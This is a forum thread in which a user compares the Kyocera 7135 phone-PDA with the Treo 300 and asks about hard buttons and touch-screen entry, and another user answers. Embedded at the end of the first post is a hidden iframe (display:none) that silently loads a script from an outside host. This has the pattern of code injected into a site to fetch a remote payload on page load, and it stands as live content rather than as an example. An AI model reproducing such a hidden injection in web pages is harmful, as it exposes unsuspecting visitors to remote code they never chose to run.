+ Reply to Thread

7135 comparison to Treo 300

1. I love the 6035 and am trying to get my employer to buy me a 7135. I want to be able to contrast it with other options. The closest I've seen in terms of having "hard" buttons is the Treo 300. I'm wondering if anyone has any experience with the Treo and can identify the pros and cons in comparison to the 7135. I'm especially curious about the value of the little "qwert" keypad in place of the grafitti entry area.

2. Are there other phone-PDAs out there w/hard buttons?

3. Am I right that the color portion of the 7135 screen is not touch sensitive? Is all entry performed in the grafitti area? If so, does that present much of an adjustment obstacle to those of us used to using both areas? How do you handle entries that heretofore required tapping the screen?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Oxo

Re: 7135 comparison to Treo 300

Originally posted by Oxojim
    1. I love the 6035 and am trying to get my employer to buy me a 7135. I want to be able to contrast it with other options. The closest I've seen in terms of having "hard" buttons is the Treo 300. I'm wondering if anyone has any experience with the Treo and can identify the pros and cons in comparison to the 7135. I'm especially curious about the value of the little "qwert" keypad in place of the grafitti entry area.

2. Are there other phone-PDAs out there w/hard buttons?

3. Am I right that the color portion of the 7135 screen is not touch sensitive? Is all entry performed in the grafitti area? If so, does that present much of an adjustment obstacle to those of us used to using both areas? How do you handle entries that heretofore required tapping the screen?
    You might want to search the board a bit. There are some Treo 300 owners or former owners who have posted there opinions...

You are 100% wrong on #3. Only the PHONE application when you receive or place a call is not touch sensitive. All of the Palm apps are, and you can switch over to a Palm app while you are on a call.

Alan